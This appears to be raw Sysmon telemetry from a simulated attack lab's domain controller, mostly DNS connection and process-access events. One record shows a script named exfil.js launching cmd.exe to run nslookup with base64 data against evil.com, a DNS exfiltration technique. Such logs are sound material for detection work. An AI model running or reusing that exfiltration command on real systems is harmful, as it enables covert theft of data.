AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51416- 354300x8000000000000000216783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51415- 354300x8000000000000000216782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51415- 354300x8000000000000000216781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51414- 354300x8000000000000000216780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51414- 354300x8000000000000000216779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51413- 354300x8000000000000000216778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51413- 354300x8000000000000000216777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.199{00000000-0000-0000-0000-000000000000}7316<unknown process>-udpfalsefalse127.0.0.1-51412-false127.0.0.1-53domain 354300x8000000000000000216776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51412- 354300x8000000000000000216775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.198{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51412- 354300x8000000000000000216774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.198{00000000-0000-0000-0000-000000000000}7316<unknown process>-udptruefalse127.0.0.1-51412-false127.0.0.1-53domain 354300x8000000000000000216773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.198{00000000-0000-0000-0000-000000000000}7316<unknown process>-udpfalsefalse127.0.0.1-51411-false127.0.0.1-53domain 354300x8000000000000000216772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.198{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51411- 354300x8000000000000000216771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.198{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51411- 354300x8000000000000000216770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.198{00000000-0000-0000-0000-000000000000}7316<unknown process>-udptruefalse127.0.0.1-51411-false127.0.0.1-53domain 354300x8000000000000000216769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.115{00000000-0000-0000-0000-000000000000}6168<unknown process>-udpfalsefalse127.0.0.1-51410-false127.0.0.1-53domain 354300x8000000000000000216768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.115{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51410- 354300x8000000000000000216767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.115{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51410- 354300x8000000000000000216766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.115{00000000-0000-0000-0000-000000000000}6168<unknown process>-udpfalsefalse127.0.0.1-51409-false127.0.0.1-53domain 354300x8000000000000000216765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.115{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51409- 354300x8000000000000000216764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.115{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51409- 354300x8000000000000000216763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.114{00000000-0000-0000-0000-000000000000}6168<unknown process>-udptruefalse127.0.0.1-51409-false127.0.0.1-53domain 354300x8000000000000000216762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.114{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51408- 354300x8000000000000000216761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.114{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51408- 354300x8000000000000000216760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51407- 354300x8000000000000000216759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51407- 354300x8000000000000000216758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51406- 354300x8000000000000000216757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51406- 354300x8000000000000000216756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51405- 354300x8000000000000000216755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51405- 354300x8000000000000000216754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{00000000-0000-0000-0000-000000000000}3736<unknown process>-udpfalsefalse127.0.0.1-51404-false127.0.0.1-53domain 354300x8000000000000000216753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51404- 354300x8000000000000000216752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51404- 354300x8000000000000000216751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{00000000-0000-0000-0000-000000000000}3736<unknown process>-udptruefalse127.0.0.1-51404-false127.0.0.1-53domain 354300x8000000000000000216750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{00000000-0000-0000-0000-000000000000}3736<unknown process>-udpfalsefalse127.0.0.1-51403-false127.0.0.1-53domain 354300x8000000000000000216749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51403- 354300x8000000000000000216748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51403- 354300x8000000000000000216747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.878{00000000-0000-0000-0000-000000000000}3736<unknown process>-udptruefalse127.0.0.1-51403-false127.0.0.1-53domain 354300x8000000000000000216746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.872{00000000-0000-0000-0000-000000000000}3736<unknown process>-udpfalsefalse127.0.0.1-51402-false127.0.0.1-53domain 354300x8000000000000000216745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.872{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51402- 354300x8000000000000000216744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.872{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51402- 354300x8000000000000000216743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.872{00000000-0000-0000-0000-000000000000}3736<unknown process>-udptruefalse127.0.0.1-51402-false127.0.0.1-53domain 10341000x8000000000000000216742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.258{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-CA46-000000005F02}2800C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.258{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-CA46-000000005F02}2800C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.258{2E1864BB-1903-629A-CA46-000000005F02}28007400C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-C946-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.242{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-CA46-000000005F02}2800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.226{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-C946-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.226{2E1864BB-18E0-629A-6742-000000005F02}39765088C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-C946-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.231{2E1864BB-1903-629A-C946-000000005F02}2952C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnat.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.211{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlocd.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.141{2E1864BB-1903-629A-C746-000000005F02}3366656C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-C846-000000005F02}7920C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.141{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-C846-000000005F02}7920C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 